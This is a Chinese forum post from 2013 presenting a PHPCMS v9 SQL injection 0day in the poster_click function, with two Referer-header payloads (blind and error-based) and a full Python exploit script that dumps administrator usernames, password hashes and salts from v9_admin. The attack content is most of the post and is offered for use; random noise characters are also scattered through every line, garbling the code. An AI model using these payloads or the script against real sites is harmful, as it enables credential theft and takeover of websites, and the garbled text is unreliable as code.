有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:( x6 R- ?) z1 z1 e
( C% p0 L% Z: q5 J6 @" h问题函数\phpcms\modules\poster\index.php
+ i5 z; l0 t! z2 l: M: f+ @ }3 I
4 z+ g+ H; \* A8 hpublic function poster_click() {$ X( ^9 v% T9 Z/ w" f4 l2 S
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
( K. A* [9 \! I$ V! p; r4 C$r = $this->db->get_one(array('id'=>$id));
* O6 Z7 s% Q1 v' hif (!is_array($r) && empty($r)) return false;$ v( ]. R" Q+ F3 U' X9 u: \
$ip_area = pc_base::load_sys_class('ip_area');
- q6 K) J) \: U$ip = ip();
2 r1 Y6 D& Y/ U; N2 H/ Y$area = $ip_area->get($ip);/ E+ A: E- w% s% u2 P) ~
$username = param::get_cookie('username') ? param::get_cookie('username') : '';/ g. g( x4 Y) G2 ^/ M% R5 C
if($id) {
' t$ C7 M# J# A4 c! C% y( o$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
5 ^1 b+ _0 h3 w% ?$ }$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));- m+ ^% R- \& w* z e, t
}
7 W) k U' {5 n2 p2 s$this->db->update(array('clicks'=>'+=1'), array('id'=>$id)); v6 {* r. I. R' Y2 d5 S
$setting = string2array($r['setting']);
6 n9 z [1 s4 ^) [* z# R. P8 Uif (count($setting)==1) {
: V8 Q4 ^; \& Q$url = $setting['1']['linkurl'];
! X- ~+ x- k2 u* ?) Z7 I} else {( K- Y' u3 N( i1 z' {: I2 ?
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];. O% R5 c1 c, m2 A) e
}$ l! T) i) ^# t5 I4 W
header('Location: '.$url);" l1 b& L1 N" H4 {( C* S& T3 o7 q) L
}( k$ G3 J4 ]( V; }" O
1 t+ a# b/ V" `9 \! w9 U! X
3 A4 S" i- i4 q/ n: Z
( y' q2 \1 h" r2 u' B8 \- Z S利用方式:* G) o: U4 {9 F3 u/ X: j7 }& Q/ r
% U6 ?% @' `3 l* P" R1、可以采用盲注入的手法:. c1 Q# [/ n; J/ x% w5 A/ C' j
3 z3 i3 M4 `! M5 L
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
2 b$ _* f" I& N: f7 h, n. @' l L
4 |5 t' q- ?/ U) s) L, |- O6 ?通过返回页面,正常与否一个个猜解密码字段。9 o/ i! H& J5 |$ O( X# h
! G+ g' W' G+ _- X9 I9 c2、代码是花开写的,随手附上了:
. f2 z) t0 d7 T' C
' C% r5 E$ p, R# S+ Y6 p2 ~) U+ k1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#0 e' M& [3 l7 e4 I3 r) `2 Q6 ]
% ?4 a8 F6 q. }: K: B( N# F% D! K- D此方法是爆错注入手法,原理自查。
$ z" }8 w! {3 h( K! x) C) B* n/ e4 j- g b f/ o% U: |6 K+ S
! s: v. Q. p6 R& E& ~7 Q
2 J. [% Z# K* @利用程序:/ Z/ k7 s% ]1 O4 `- v) c; f& j+ ]& ~
& S/ z. S! C3 `5 ~+ T' X3 b#!/usr/bin/env python
* B5 c; ?7 V" E3 iimport httplib,sys,re
3 ~5 O. j! I0 A9 K( ?; j& d: b# A% G7 V1 U+ ~1 F- J
def attack():/ @; o- W E" v( Z' d+ @5 w
print “Code by Pax.Mac Team conqu3r!”. C1 [4 J8 e6 Z9 W+ W; p3 }/ g: Z
print “Welcome to our zone!!!”
* S1 ]3 A7 D8 Durl=sys.argv[1]
+ M3 g, j, G% |6 J8 `paths=sys.argv[2]# Z" i, e6 `9 [- z1 j! ?% ]1 M; G
conn = httplib.HTTPConnection(url)0 I3 S' n* j8 o) o
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,+ H: v8 H* S) R# C& u4 P5 @
“Accept”: “text/plain”,
7 u2 U$ P- [* b/ q“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
7 Y0 J$ ~. p: \" a1 M& }% gconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
4 i% a3 U' V; m2 N4 u& b4 K: ur1 = conn.getresponse()
, G( C, B" x6 x( j; t" H1 U" p( fdatas=r1.read()3 x. t+ |) j8 a6 f
datas=re.findall(r”Duplicate entry \’\w+’”, datas)5 y- X6 r) x. S2 I" d, D
print datas[0]; w/ b+ W& D4 ^$ _! `
conn.close()! E8 R, x) S7 T4 t9 A0 [7 a5 X
if __name__==”__main__”:
K# c3 m% K9 k. K$ h0 _) Z" Uif len(sys.argv)<3:
9 p) u& n6 W) G k0 nprint “Code by Pax.Mac Team conqu3r”
7 k& ` A8 R; j. _print “Usgae:”4 b4 i1 }! u8 F4 T/ z6 h
print “ phpcmsattack.py www.paxmac.org /”; L/ ]4 h2 c( a+ z3 j3 o+ v
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
) k! f& t7 I( F" ~/ y! X, [sys.exit(1). I, Y& ?2 e) q- C- v" q
attack()
' u$ B' f. ~- J( v' s
- N* o# D( m' C# ]+ u4 B |
发表于 2013-1-11 21:01:00
收藏
支持
反对